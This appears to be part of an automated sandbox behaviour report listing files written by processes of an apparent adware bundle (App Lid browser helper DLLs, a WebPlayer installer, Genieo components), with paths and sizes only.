C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022023l.pfb (23586 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021003l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010015l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_base.ps (4226 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\uninfo.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wan_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_trap.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052004l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m_m.xbm (971 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019024l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\acctest.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_type1.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010013l.pfb (16346 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pfile.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\jispaper.ps (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xpm (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_t_m.xbm (363 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\packfile.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_img.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devcs.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\rollconv.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_draw.ps (11330 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\landscap.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewps2a.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ42.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resmp.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_sepr.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl5_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\cid2code.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052003l.pfb (32818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gslp.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\lines.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfn.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052023l.pfb (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pf2afm.ps (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_typ32.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\align.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019023l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_resst.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_frsd.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cff.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_agl.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.GS (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\zeroline.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewgif.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_font.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ccfnt.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1ops.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stocht.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewpbm.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markhint.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs2.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xpm (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ksb_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\prfont.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdf_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ps2ai.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS (700 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgx_e.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceimg.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fform.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\markpath.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_btokn.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps2.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018035l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_res.ps (8594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019044l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_stres.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021024l.pfb (22674 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dscp.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mex_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_m.xpm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_rdlin.ps (886 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.dir (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\docie.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022004l.pfb (28914 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\level1.ps (117 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciecs3.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewmiff.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_il2_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019004l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l_m.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\z003034l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\p052024l.pfb (32698 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\image-qa.ps (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\d050000l.pfb (11394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059033l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021004l.pfb (25474 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gsnup.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\decrypt.ps (369 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cspace.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2c.ps (2642 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010033l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fapi.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_css_e.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\fonts.scale (4850 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OSF (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewcmyk.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_l.xbm (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cmdl.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\printafm.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\traceop.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\caption.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Info-macos.plist (483 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_pdfwr.ps (3122 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_init.ps (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\unprot.ps (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_lgo_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_indxd.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ttf.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gswin32c.exe (31554 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_icc.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\COPYING (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdfopt.ps (9458 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_mro_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_wl1_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidtt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.OS2 (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_std_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\a010035l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_cidfm.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATB (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\xlatmap (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ll3.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.SGI (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.ATM (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap (113 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\viewjpeg.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\bdftops.ps (3650 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_statd.ps (1106 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\ht_ccsto.ps (56210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_patrn.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\errpage.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devn.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs (220 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019063l.pfb (17026 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pdf_sec.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Sol (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcolor.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\font2pcl.ps (2210 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.Ult (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n022024l.pfb (26706 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n021023l.pfb (24930 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_epsf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\type1enc.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ce_e.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\b018032l.pfb (28130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_setpd.ps (5522 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\s050000l.pfb (7778 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\Fontmap.VMS (1442 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_s.xbm (605 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fntem.ps (818 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dpnxt.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_ciddc.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\n019043l.pfb (17754 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_dps1.ps (242 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\showchar.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_fonts.ps (11338 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskn.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\pphs.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\c059013l.pfb (27394 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\wftopfa.ps (578 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\quit.ps (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_diskf.ps (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\gs_devpxl.ps (50 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\WZSE0.TMP\GPLGS\stcinfo.ps (4226 bytes)
The process regsvr32.exe:3688 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\App Lid\App Lid-bho64.dll (835 bytes)
The process regsvr32.exe:3404 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\App Lid\App Lid-bho.dll (671 bytes)
The process webplayer_installer.exe:716 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\storage.js (979 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\WebPlayer.exe (7533 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\initialize.js (67 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\common.js (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\initialize.js (66 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\main.js (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\main.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\Uninstall.exe (843 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\jsonstorage.js (651 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\config.xml (823 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\json.js (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\shortcut.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\web_player\web_player.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\nsfA2A6.tmp\nsExec.dll (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\installer.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\xhr.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\icons\tray.ico (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\stub.html (680 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\event_listener.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\utils.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\WebPlayer\scripts\kango\io.js (751 bytes)
The process framework_setup.gen:1048 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\targetDefaultPortals.xml (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_tmp_template.txt (61 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\gad_categories.txt (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xstream-1.3.1.jar (15168 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\all_datetime.stop (18 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\debugInfoCollector.l4j.ini (115 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops2_stemmed.stop (416 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\Info_1_7.plist (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\de_top_1000_draft.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\da_topwords.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\tr_stops_stemmed.stop (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\servlet-api-2.5.jar (4992 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\nl_stops_stemmed.stop (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\heb_white_list.txt (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\smtp.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\bin\genieo_console.l4j.ini (118 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\he_common500cleaned.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\x64\NativeUtils.dll (21216 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-core-1.0.1.jar (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\da_stops_stemmed.stop (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sac.jar (14 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_MergedStemmedEnglish.stop (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\NativeUtils.dll (16424 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\jetty-webapp-7.3.0.v20110203.jar (32128 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\tray_icons_mac\tray_mac_installing.png (345 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\rome-1.0.jar (8184 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\it_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\uninstall\framework_uninstall.exe (825 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\es_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\nl_topwords.txt (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\en_numbers.stop (54 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\xpp3_min-1.1.4c.jar (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\sqlite-jdbc-3.7.2-windows.jar (20624 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\drafts\it_top_1000_draft.txt (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed1.stop (559 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\no_stops_stemmed_more.stop (583 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_top_500_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\res\engine_tray_icon_dev.png (632 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\ro_morestops.stop (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\ini4j-0.5.1.jar (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\stopwords\de_merged_stemmed.stop (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\modules-0.3.2.jar (9320 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\dd-plist.jar (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\lang\en_nationalities.txt (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\explicit\bannedList.dat (388 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\commons-codec-1.6.jar (8560 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\conf\categories_mapping_outb.txt (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\Engine\lib\protostuff-runtime-1.0.1.jar (9320 bytes)
